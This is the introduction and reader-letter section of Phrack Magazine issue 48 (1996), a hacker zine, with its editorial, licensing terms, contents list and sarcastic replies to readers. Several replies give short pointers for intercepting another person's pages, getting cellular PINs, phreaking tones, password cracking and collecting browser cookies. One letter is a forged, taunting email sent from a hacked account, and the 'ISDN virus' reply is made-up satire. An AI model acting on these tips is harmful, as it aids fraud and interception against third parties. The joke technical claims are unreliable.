==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 1 of 18 Issue 48 Index ___________________ P H R A C K 4 8 September 1, 1996 ___________________ ~ WARNING! This is a TOP SECRET-MAGIC EYES ONLY document containing compartmenalized information essential to the national security of the United States. EYES ONLY ACCESS to the material herein is strictly limited to personnel possessing MAGIC-12 CLEARANCE LEVEL. Examination or use by unauthorized personnel is strictly forbidden and is punishable by federal law. ~ Yes, it's the annual issue of Phrack you've all been waiting for, hopefully you have kept your security clearances current. The delay has been a long one, much longer than anyone would have liked. Obviously Phrack was never meant to be put out so infrequently, but the continual pressures of daily life have taken their toll on yet another editor. Yes, those little things like going to work, paying the rent and all the other hassles that interfere with putting out a large quarterly hobbbyist publication. It finally came down to three choices: keep the status quo and put out an issue whenever, charge per issue, or get in some new blood. Obviously the status quo sucked, and an issue a year was just unacceptable. Charging everyone was even more unacceptable, even though "Information wants to be $4.95." So, that left bringing in more people to help. The hard thing was finding people worth bringing into the fold. There was never any shortage of people who wanted to take over the whole magazine, but it wasn't until three of them banded together and volunteered to take over the main editorial nightmare that it looked like there was a light at the end of the tunnel. Voyager, maintainer of the #hack FAQ and editor of CoTNO, RedDragon editor of FeH and continual discoverer of Linux root bugs, and Daemon9 admin of InfoNexus and text file author extraordinaire, came forward en masse and said, "We'll do it." Most of you have no idea how hard it is to put out a magazine like Phrack with any degree of regularity. You have to track down articles, answer tons of mail, read all kinds of news, edit the articles (most of which were written with English as a second languge,) maintain the mailing list, maintain the WWW site, etc. Hopefully with all the new people involved, the new division of labor will allow everyone to contribute and put out a magazine in a very timely fashion. (And allow poor old Erikb to rest easy knowing the magazine is being taken care of so he can devote more time to being a puppet-like stooge of The Man.) In any case, you've waited long enough...here's Issue 48. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. Enclosed is $________ We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editors : Voyager, ReDragon, Daemon9 Mailboy : Erik Bloodaxe 3L33t : Mudge (See Below) Short : Security Dynamics (NSDQ:SDTI) (See Above) Myers-Briggs : ENTJ News : Datastream Cowboy Prison Consultants : Co / Dec, Tcon Sick Sexy Horror Chick : Poppy Z. Brite Thanks To : Cherokee, Damien Thorn, Boss Hogg, StaTiC, Sendai, Steve Fleming, The Guild Obi-1, Kwoody, Leper Messiah, Ace SevenUp, Logik Bomb, Wile Coyote Special Thanks To : Everyone for being patient Phrack Magazine V. 7, #48, September 1, 1996. ISSN 1068-1035 Contents Copyright (C) 1996 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.com and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 ftp.fc.net (Phrack FTP Site) /pub/phrack http://www.fc.net/phrack (Phrack WWW Home Page) phrack@well.com (Phrack E-mail Address) or phrackmag on America Online Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) ** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** Phrack goes out plaintext...you certainly can subscribe in plaintext. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 48 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by the Editorial Staff 13 K 2. Phrack Loopback / Editorial 55 K 3. Line Noise (Part I) 63 K 4. Line Noise (Part II) 51 K 5. Phrack Pro-Philes on the New Editors 23 K 6. Motorola Command Mode Information by Cherokee 38 K 7. Tandy / Radio Shack Cellular Phones by Damien Thorn 43 K 8. The Craft Access Terminal by Boss Hogg 36 K 9. Information About NT's FMT-150/B/C/D by StaTiC 22 K 10. Electronic Telephone Cards (Part I) 39 K 11. Electronic Telephone Cards (Part II) 66 K 12. Keytrap Revisited by Sendai 13 K 13. Project Neptune by Daemon9 52 K 14. IP-Spoofing Demystified by Daemon9 25 K 15. Netmon by Daemon9 21 K 16. The Truth...and Nothing but the Truth by Steve Fleming 19 K 17. International Scenes by Various Sources 33 K 18. Phrack World News by Datastream Cowboy 21 K Total: 633 K _______________________________________________________________________________ "The culture of criminal hackers seems to glorify behavior which would be classified as sociopathic or frankly psychotic." (Mich Kabay, director of education, NCSA, NCSA News, June 1996) "The Greek word 'diarrhein,' which means 'to flow through,' describes diarrhea very well." (Gross-ology by Sylvia Branzei, Planet Dexter, 1996) "Fuck you, clown!" (Thee Joker, Defcon IV, July 28, 1996) ==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 2 of 18 Phrack Loopback ----------------------------------------------------------------------------- This is a response to the letter from KoV included in "Line Noise Part I" from Phrack #47. After reading this open letter, I nearly died of laughter. The inaccuracies of KoV's story were numerous and comical. However, from the way KoV presented themselves, they are acting as if it was their BBS network and a government conspiracy that has gotten them into trouble. As a result, they will appear to many as a wrongfully persecuted group of computer users. Apparently, KoV likes to fancy themselves as a group that spread "open-minded" and "sociopolitical" beliefs through their BBS network, KoVNet. They claim that they "questioned [the] authority" of those who "tried to oppress [their] free-thinking minds." They then state that this caused the "AmeriKKKan" government to monitor their actions, "stalk [them] in public places", and and attempt to destroy them "from the moment of KoV's conception." This is ridiculous. First off, their BBS network was not enough to cause the government to stalk them in public. If a BBS network that contains disdain for the American government justifies the stalking of its users, then NUMEROUS people in this country are currently being followed in public. Therefore, KoV's claim about their threatening BBS network is an attempt to make themselves look bigger and more important than they were. Now, let us look at the real reason they are facing legal actions. KoV is blaming "false accusations from a local university" for their troubles. However, the accusations are not false and after you read what led them to be caught, you will reallize that KoV was never a threat to the government. I do not know exactly how many universities they hacked. However, if it is one local university as they claim, it is Skidmore in Saratoga Springs NY, the university which I attend. I myself have played around with Skidmore's computers and do not feel any loyalty or patriotism to my school. Therefore, it is not a grudge I am harboring against KoV for hacking Skidmore's system that is causing me to write this. It is merely the fact that KoV is distorting the truth in an attempt to turn themselves into martyrs. Personally, I cannot blame anyone for breaking into Skidmore's system. Since Skidmore was relatively new to the Internet, their security was very lax making it very easy to explore and play around with the system. If KoV had any knowledge whatsoever, they would not have been caught or even detected by Skidmore. It was their egos and lack of knowledge that led to their investigation. I myself saw with my own eyes how they were detected. The system that was hacked by KoV was wopr.skidmore.edu. Well, one day I took a look at the system logs for WOPR and saw "root login from [some out of domain ip address]" standing out quite well. If KoV was really so Knowledgable and dangerous, wouldn't they know how to edit system logs? However, they did not which shows KoV is another example of people who managed to obtain root access and did not know what to do with it. Some people would think, "Big deal! Just because they didn't edit the system logs does not mean that they could ever be linked to the crime." This is very true. However, this would have required KoV to keep their mouths shut about the incident. Yet, they did not. Apparently, Lord Valgamon made a post to some of the BBS networks he frequented where he showed off about hacking Skidmore and told everyone how he did it. This hurt KoV greatly. As a result, a narc on the BBS network alerted CERT about Lord Valgamon's claims who, in turn, reported the incident to Skidmore. This caused Skidmore to now have a name, though anonymous, to apply to the break in. Consequently, the proper authorities became involved and they began to track down Lord Valgamon on the BBS networks. From the above facts, you can probably guess that the "AmeriKKKan" government would never have a special interest in KoV because they are the typical stereotype of an "ELiTE M0DeM d00d." If Lord Valgamon and KoV had kept their mouths shut about the incident, they never would have been caught. However, KoV needed to tell their ELiTE BBS scene how bad-ass they were and, as a result, their bad-asses are getting spanked hard. KoV had not done any crime or brought up any controversy against the government. Their only crime was that they were stupid. I understand that KoV is now asking for the support of the h/p and political groups in the scene. However, I would not recomend anyone to give them support. There was no government conspiracy against KoV and everything that has happened to them was brought on by their own stupidity. Do not turn a bunch of egotistical and immature criminals into martyrs. I will end this with the same words KoV started their letter with: "Don't believe the hype." - Public Enemy. Sincerely, Mr. Sandman [ Wow. Well, we always like to hear all sides to any story, and each time something gets published that gets under someone else's skin, we inevitably do. Thanks for writing! ] ----------------------------------------------------------------------------- Hello! Let me tell some words about myself. Computers and telecommunications take quite important place in my life. In past I worked as a programmer, system administrator and finally I ran my own business selling computer hardware (now I have closed this business because I have lost my interest for trade and due to some financial reasons). I owned my own BBS for several years but now I have it shut down because I do not want support lamers leeching files 2-3 years old and having no ideas what email is. Now almost every day I spent many hours reading Internet newsgroups, mainly dedicated to phreaking/hacking. A friend of mine, gave me some Phrack issues (newest was #42 of 1993). I have read them and like them very much. If it is possible, please drop me a line how could I subscribe to Phrack magazine. If you do, please encrypt your reply and send it via anonymous remailer, because now Russian government begun to control email messages very thoroughtly. I have private information from friend Internet provider about the FAPSI (Federal Agency of Government Communications and Information -- some form of Russian NSA/FCC hybrid formed from ex-KGB agents) actions aimed to control data passed through Internet channels in Russia. FAPSI ordered all Internet providers in St.Petersburg to install software which task will be to copy all messages addressed to/from persons which FAPSI interested in and to scan for some keywords specified by FAPSI. Providers will get their licences for providing communication service only after installing such spy software. There is a rumour that FAPSI has installed hidden microphones (bugs) in providers' offices to control any "illegal" activity (free information exchange always was illegal in USSR/Russia). I say "rumour" because I have heared it only from one trusted source, other information came from several trusted sources simultaneously. BTW, using a PGP is illegal in Russia too, because FAPSI can not break the PGP-encrypted messages. If you find information written above meaningful, you may use it in your own discretion but with some precautions -- remember that country I live in have barbaric laws and Russian Police/Security Services have _absolute_ power to put in jail anyone they want without any court or warrant. [ Normally I strip out all anonymous remailers, because they interfere with the bulk mailing process, bounce mail, and generally screw things up...however, there are always exceptions. The FAPSI requirements are extremely interesting to hear about. It certainly makes sense, and I fear that our country is likewise heading towards that goal. If you get the chance, you ought to write more about being a hacker in your country, since I am sure the rest of the world would be fascinated by it. ] ----------------------------------------------------------------------------- Greetings... I looking for just a nibble of information... When one logs into a remote system and gets login and passwords questions how does one write a program to crack a password... I'm sure that is not an easy question or even a nibble perhaps a byte... Seeking Info, SPY [ Well, I can't tell you how to write a program to crack passwords without knowing what kind of system you want to crack passwords for. I can't tell you how to say "Where is the bathroom" in a foreign language without first knowing what language you want to say it in. If you are talking about UNIX passwords, there are already numerous programs written to "crack" passwords. I would suggest you go poke around and look for programs like "crack" or "killer cracker." If you can't find reference to either of these on the net, then you really ought to consider finding a new hobby. ] ----------------------------------------------------------------------------- Wuzup! I have a pager that I don't use anymore because I can't afford the bill. So I was wondering if there is anyway I can hook-up my pager for free without going through a paging service. [ Depending upon the pager, you can possibly change or add capcodes through special programming software. Almost all Motorola pagers allow you to do this. This won't allow you to "really" get free service, but you can piggy back on top of some known person's pager service (or just intercept their pages.) The only way to get "free" service is to reactivate the pager's current capcode in the paging system from the local provider who owns the frequency the pager is crystaled for. ] ----------------------------------------------------------------------------- I was browsing through Issue 47, and saw something that had caught my eye. ""THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member." A few weeks ago, I read the book Masters of Deception, a book about the "war". Wasn't the name of the rival group Masters of Deception? I assume that Erik would know, he appeared to be the main "villain" in this version of the story. Any response would be appreciated. [ I was the villain? Well corn my pone. In any case, you should always take everything you read with a grain of salt. In my opinion, the book was a piece of shit. Since many of the MOD members decided to viciously attack the author, Josh Quittner, posing as the ILF, I can only assume that they felt likewise. So you decide for yourself about all that. Oh, and buy the damn t-shirt. http://www.fc.net/phrack/shirts.html ] ----------------------------------------------------------------------------- Hi Can you teach me to be a hacker i think that that would be cool so what do you think can you teach me to be a hacker and to be cool you are one of the biggest hackers in the world [ No, I'm afraid as one of the biggest hackers in the world, I'm far too important to expend any energy on the likes of you. Now go back to your PlayStation and get better at Toshinden. ] ----------------------------------------------------------------------------- Where culd i find some zipped red box tones? Or blue box. CyberOptik [ Make your own tones with the Blue Beep program. Follow some of the links from the Phrack Home page, and you should find this program on any number of sites. ] ----------------------------------------------------------------------------- Hallo, din Gamle rn!! (Norwegian for: Hello, you Old Eagle!!(direct.translated.) (rn(Eagle) is pronounced like: earn ) End of Norw. lesson. This is a question from one viking to another; I am a newbie in the H/P division so I spend my days(and nights!) dwnloading all i can find about the subject. But I do have some problems with the cellular phone system over here, NMT 900. Which your system AMPS have stolen all the good parts from! Untill last year i could program my cellular phone, Ericsson NH 99, by programming and switching the 27c512 prom. But now the norwegian telecompany Telenor Mobil has inserted pin codes, i.e. if my cellular phone number used to be 12 34 56 78 (we have 8 digits), then my phone number now has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the owner of the phone. I do have programs and cables for programming the phone with all 8+3 digits, but then I have to know the 3 digits, the pin code, and I do NOT know how to download them from the cellular traffic going around my place. Can you help me beat the system? How do I dwnload the pin code???? I read that they are going to use the same system i the N.Y. area within this year, so someone is going to ask you these qst. sooner or later. Be prepared! Or is my qst. old news? Maybe everyone knows how to do this? Exept the norwegian newbie.... Vennlig hilsen (thats:Best regards) Stian(Mr.Phonee) Engerud [ I'm not sure I understand how the last 3 digits can be unknown to the owner of the phone. If your number changes, then obviously you have to know the new number. Are you sure this isn't just a touch-tone PIN entered in when you use phone, like systems over here in the states? If it is, then you'll still need some kind of ESN reader, or other means to decode the reverse channel, and a 900 mhz-capable radio and a touch-tone decoder to grab the PINS as well. It's incredibly annoying. On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems in place. Have they upgraded their ETACS systems as well? If not, use those. ] ----------------------------------------------------------------------------- From: zadox@mindspring.com (Ron Zalkind) Subject: Phrack Magazine: Strategic Marketing Partnership I'm one of the principals of a new Internet-based, second-generation, Information Technology service. This new Internet service debuted last week at the Culpepper Forum in Atlanta. I'd like to propose a strategic marketing partnership with Phrack Magazine. This proposal will spell out what it is our service does (including a product demo), how we think a partnership with Phrack Magazine might work, and how we can all increase profits by doing so. Please reply to this E-mail with the name and E-mail address of the 'director of online strategy', or the 'circulation director', for Phrack Magazine. Thank you. Ron Zalkind, President R.E. Zalkind & Co. Inc. Voice: 770-518-1600 Fax: 770-642-0802 E-mail: zadox@mindspring.com (Ron Zalkind) Ron Zalkind [ WOW! I can't wait to hook up with THESE incredibly savvy people so Phrack can dramatically increase our profits. Let's see, if we make any money, we'll see a 100% increase! It's a no-lose situation. Man, I hate Internet mass-mailers. Don't these people attempt to qualify their leads even a LITTLE? Strategic Marketing Opportunities with free computer hacker magazines? Ron? Hello? ] ----------------------------------------------------------------------------- First of all, great work on the 'zine all these years, hope to see 48 soon. I have an article from "Airman" magazine (I believe it was the April 1996 issue), the US Air Force magazine given to military members. It details the efforts of AFOSI (Air Force Office of Special Investigations) to prevent hackers from breaking in to military computers. Considering it's coming from the military, it's not too badly written (the author actually knew the difference between "crackers" and "hackers"). I don't have a scanner, but I'd be more than willing to snail mail it to you. I just wanted to check and see if you guys already had it of not. If you don't, let me know, and I'll get it to you ASAP. Keep up the good work.... [ We would definately like to see the text from this article. Please forward it! In fact, if any of you readers ever come across ANYTHING you think is cool, email it to us, or snail mail it. We love getting mail. We will print anything cool. (And a lot of lame things too!) Just stop sending us credit histories and password files. :) ] ----------------------------------------------------------------------------- need access to w.gov xxx now [ w.gov? Uh, ok, let's see: Reserved Domain (W-GOV-DOM) Domain Name: W.GOV Administrative Contact, Technical Contact, Zone Contact: Internet Assigned Numbers Authority (IANA) iana@isi.edu (310) 822-1511 Record last updated on 02-Dec-93. Record created on 01-Dec-93. Do you know what this means? Duh. ] ----------------------------------------------------------------------------- From: health@moneyworld.com Subject: Scientific Discoveries Minimize Aging (DHEA) http://dhea.natureplus.com Take advantage of the amazing benefits of DHEA. In the search for the FOUNTAIN OF YOUTH, DHEA is a must README. People, age 70, feeling and acting 25. Read the medical research at http://dhea.natureplus.com .A quote from an article published by the New York Academy of Science written by Dr. S.S.C.YEN; "DHEA in appropriate replacement doses appears to have remedial effects with respect to its ability to induce an anabolic growth factor, increase muscle strength and lean body mass, activate immune function, and enhance quality of life in aging men and women, with no significant adverse effects." Regain the eye of the tiger! Don't wait ! Click on: http://dhea.natureplus.com To terminate from the Health Catalog, Reply to health@moneyworld.com with "remove" in the subject field. Bob Williams 206-269-0846 P.S. You will find a full line of Vitamin, Supplements and OTC Health Catalog at http://natureplus.com. [ Yet another Mass mailing! How many lame mailing lists are we on? You have to wonder about these things. But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH! I need to get me some of that. A little DHEA, a little GHB, a little DMT, and you'll look younger, feel younger, and have the brain of a two year old. And besides, Jesus loves acronyms. ] ----------------------------------------------------------------------------- Do you listen to 2nur radio? If so have you ever heard a band named SOYLENT GREEN or GOITER on any of their shows? please email me back thanx, Nick [ Nick, I hate to break it to you, but: SOYLENT GREEN IS PEOPLE!!! IT'S PEOPLE!!!!! ] ----------------------------------------------------------------------------- From: Pete Shipley To: best-of-security@suburbia.org, cert@cert.org, cudigest@sun.soci.niu.edu, daddict@l5.com, dc-stuff@fc.net, dtangent@defcon.org, emmanuel@2600.com, grayarea@gti.gti.net, letters@2600.com, mycroft@fish.com, phrack@freeside.fc.net, phrack@well.sf.ca.us, proff@suburbia.org, root@iss.net, root@l0pht.com, root@lod.com, root@newhackcity.com, spaf@cs.purdue.edu, strat@uu.net, will@command.com.inter.net, zen@fish.com Subject: Shipley owned, hacked and thrashed Please distribute this letter freely: This posting is being made from dis.org, and this is not forged e-mail. Even though this mail is coming from Peter Shipley's account, I am not him. Who am I? That is unimportant except to say that I cannot take anymore of the "DoC" crowd's BULLSHIT. I would like to raise an issue with them, mostly (but not all related to the incident at defcon). To you drunken losers at defcon who had to fuck with Netta's speech (DoC on hold here for a second, it wasn't just them): If you didn't want to hear Netta's speech (though in your opinion it may be monotone, boring or even wrong) you DIDN'T HAVE TO STAY AND LISTEN TO IT. There were some people that WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST ASSES. How different are you now from a government that would like to enforce censorship upon it's own people? All I can say is "getbacks are a bitch". A few things to consider: 1. Shipley is an utter tool. His whole appearance is a front. If he's such an awesome security specialist then why was he so easily owned? Also I bring into question some of the motives he has for harassing Netta Gilboa. Her boyfriend (who is currenlty in jail) was known for continually hacking (yes CONTINUALLY hacking) Peter Shipley. I know this because I spoke with Chris (n00gz) many times and was aware of this fact. In my opinion Petey, anyone that is foolish enough to hire you to secure their systems are idiots; whether it's the military, government, industry, a business -- they should all just ask for their money back. You are a discredit to your profession. 2. Shipley is a coward. Only cowards attack people weaker than them but back away from a confrontation with someone of equal size or power. Careful Peter -- next time don't piss off Bootleg, he might hurt that pretty boy face of yours (though I admit, I would like to see it) 3. Hackman was a gob of shit. Peter Shipley has come to know his true calling in life now (to wit: Webmaster). 4. The fangs make you look like a homo. Maybe you are (nothing against them actually, just stating a fact). Shipley, se7en, (ayoung, where's your piglet account?). Get a fucking life. Maybe instead of contstantly going around "Searching for intelligent life" perhaps you should stay home and secure your own systems. You are all owned, now don't you feel stupid? You should. You are. DIS.ORG == DISORGANIZED. -- galf@upt [ This is almost funny. Notice I said, almost. You have to admit though, Shipley always comes with some damn fine women in tow. Oh the things I did in my mind to that blonde... Something tells me that the author of this forged message could use a lot of Shipley hand-me-downs: Women, contracts, references, etc... ] ----------------------------------------------------------------------------- Hey, I just watched the movie Hackers, and I was just curious to know if They used you and the LOD to models the characters in the movie after? Alot of the handles, and choice phrases they used sounded awfully Farmiliar with what went on, or at least what the book said went on. Meds:} [ Actually, meds, the screenwriter hung around with "MOD" and other people from the New York hack scene and picked up some pointers, and then used people like Dead Lord and Emmanuel Goldstein as technical assistants. Or something like that. Please, don't ever associate "LOD" with this piece of shit again. :) ] ----------------------------------------------------------------------------- A lot of people have read the article about Joe Engressia and his time in Memphis where he was arrested by the police and banned from his dream of working on phone lines. Well, at the time when he was living on Union avenue, my mother was in charge of payroll, hiring and the like at a local switchboard. This was back in 1972 when the phone system was less of the fuqup it is today. Well, a friend of my mother's taught Mr. Engressia how to cook and other related houshold things despite his handicap. Shortly after or before this, (I am unsure) he was arrested by the police. I think this was also about the time the interview was made. Anyway, the local phone companies would not touch him, not even to give him service. My mother, after talking with him decided to hire him as a phone consultant. (Her opinion of his was that "He was so brilliant, it was scary, I mean REALLY scary.") She though he was a great "kid" (22 at the time) and was the best consultant that they had. He worked there for three years before moving. The last my mother heard was that he was living in a Denver high rise working as a consultant to a corporation or something out there. I only just started talking with my parents about this today, but I am sure that they will tell me more of him. Oh, and my father was good friends of Joe too, he and Joe were Ham Radio operators here in Memphis and my father still phreaks on them so I am sure that Mr. Engressia does too. Anyway, my father is teaching me how to hack, and my mother is teaching me how to phreak, but she only knows a little of outdated info and wants to get in touch with Joe. If anyone, ANYONE has any information about Joe, or if somehow this article gets to Joe, please let me know at the following e-mail address: Kormed@aol.com. [ We used to call Joe on conferences a long time ago. I could probably dig his contact information up, but I really doubt he'd appreciate his number being published in Phrack. Hell, if your parents are teaching you how to hack & phreak, then certainly they can find Joe. He was always listed in Directory Assistance when we tracked him down years back. Have you even really looked for him? ] ----------------------------------------------------------------------------- quick question For Bloodaxe. Ok, I know you probably get this Alot,but I just have to ask?... Did you Really Date Christina Applegate? had to ask, [ Man, now that is a rumor that I would love to have started myself. No. Never dated her, never met her, never talked to her, never had any contact whatsoever. Spent some time holding up some of her posters with one hand, but that's about it. ] ----------------------------------------------------------------------------- do you have any info on stealing magic cookies ?? [ No, but I can trade you these magic beans for your cow. If you plant them they will grow high into the sky, towards the castle in the clouds where the giant lives with the talking harp and the goose that lays the golden eggs. Go read some of the WWW Security Lists, if you're talking about what I think you are. There are also javascript routines that collect navigator cookies from clients hitting your page. After briefly looking around, I can't find the specific sites to snarf them from. Go do a webcrawler search for WWW security or javascript security. ] ----------------------------------------------------------------------------- Dear Phracks - I'm a Free Journalist from Germany and I'm going to write an articel about ISDN and the possible danger which might happen to a company etc. getting hacked by some agnets, spies etc. from other countries. So I'm looking for indos about ISDN-Viruses, Hackers and background infos. Can you help me? [ Wow, a "Free Journalist." I thought that pesky national socialist party imprisoned all you guys. ISDN Viruses are quite possibly the worst thing to happen to computing since the creation of the Cellular Trojan Horse. Basically, these viruses travel over the wires using the X.224 transport protocol, and seize the D channel using Q.931. All SS7 data sent over the D channel is quickly compromized and re-routed to different signal transfer points, causing massive ANI Failure over the entire routing mesh. Rumor has it that the Internet Liberation Front was behind these viruses with heavy investement coming from the German Bundesnachrichtendienst's Project Rahab. These hackers were paid with AT&T calling cards encoded with a polymorphic encryption scheme, and cocaine. You can quote me on this. ] ----------------------------------------------------------------------------- Well, i wanna make an offer, and a nice deal. i am n editor in an H/P/C magazine of HFA ( universal H/P/C group..) well, what i wanna offer is a joining both of the papers 2gether, OR! u want more subscribes, we'll publish ya, but adding 1 article from ya'r paper, saying from where it is. so, if we can make this deal, contact me asap! 10x. [ Let me see if I understand this, your "universal H/P/C group" has a magazine, and wants to do "Phrack" the great honor of merging with us, or printing our articles? Wow. What a deal. You mean by linking up with you guys, we will hit a greater audience "universally?" So, merging our roughly 10,000 direct email subscribers, and a roughly 75,000 more WWW or misc. readers, adding in your readers, that should bring us up to 85,001 readers! Universally! FAN-FUCKING-TASTIC! Are there so many rocks for you people to crawl out from under? Sheesh! ] ----------------------------------------------------------------------------- Hello, I have a need for a network sniffer. Specifically, one that will sniff IEEE-802.3 packets and TCP/IP packets. Any leads? [ Well, gee, are there network sniffers that won't? Go do an archie search for tcpdump. ] ----------------------------------------------------------------------------- I was just strolling by you page: http://freeside.com/phrack.html, and found my link "Showgirl Video" (link to vegaslive.com). I am the creator and webmaster for the site. If I can ever be of assistance to you let me know. We are one of the few sites in the world that has a live stage and live 1 on 1 conferencing in one place. john... [ Ya know, every time I'm in Vegas I make it out to Showgirl Video with a bucket of quarters and a healthy dose of bad intent. I have to congratulate you guys for going on-line. I love it when two of my favorite things come together (smut and computers). Unfortunately, The Vegaslive site is kind of pricey. You guys seriously need a flat fee. I suggest you look at a SUPURB site: http://www.peepshow.com That place has a flat fee, all you can eat pricing structure, the way God meant it to be. Take note, and follow suit. ] ----------------------------------------------------------------------------- I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the passw: 2697435 ...I need the passw to have access to SCAN or TAC function ...please, help me! Thank Regards [NCG] [ I'm not familiar with that phone, but I'd start off looking through Dr. Who's archive of cellular info at: http://www.l0pht.com/radiophone If what you are looking for isn't there, there might be a link to somewhere that has it. ] ----------------------------------------------------------------------------- my name is azreal! I am also known as the angel of death. why did you sell out to the feds back when you running comsec. i think phiber optick was a great guy and i would have been glad to work with a legend. do you know his e-mail adress azreal [ Azrael? The Angel of Death? I thought Azrael was Gargamel's annoying cat. But to answer your question, I sold out to the man ages ago for money. Pure and simple. Once you hit puberty, you might have a need for cash. Once mommie sends you off to college, you might need it even more. And in the distant future, when you get out on your own, you will really know. Yes, phiber is swell. There have been good pictures of him in many national magazines. Try not to get the pages stuck together. And, yes, I do know his email address. Thanks for asking! ] ----------------------------------------------------------------------------- From: prodigy.com (MR MARK P DOLESH) How do you hack? [ Very carefully. ] ----------------------------------------------------------------------------- Did you ever write a edition that deals with breaking the screensavers code? If so which one? How about breking the Win95 password. You know the one that allows you into Win95? [ We pass all articles about breaking Windows Screen Savers on to the more technical forum at 2600 magazine. To disable the Win95 password, install Linux. ] ----------------------------------------------------------------------------- A phriend of mine showed me your sight a few days ago at his house...I thought it was pretty cool. I dloaded a few issues and stuff to check out...I haven't been on the internet to long so I'm still trying to phined more stuff that interest me, and I would like to set up my own page like that but my account is thru the school...Is there anyway around that? So it can be like border line legal? How underground can one go??? If you still have the file on where the line is please send them...Thanks. [ Your account is through your school, but you are looking for a way around that? Hmmm...let me see. I'm just going to throw out something wild and crazy, but, what the hell: Maybe, get another account through another Internet provider? I know, it's just too outlandish. Forgive me for being so zany. How underground can you really go? I used to have that file you are looking for, but I was so underground at the time, it got soiled with mud and disintegrated, eventually polluting the water table, and was ultimately drank by the city of Pasadena, Texas. ] ----------------------------------------------------------------------------- In regards to volume one ,issue four , Phile #8 of 11 ... This shit has got to be 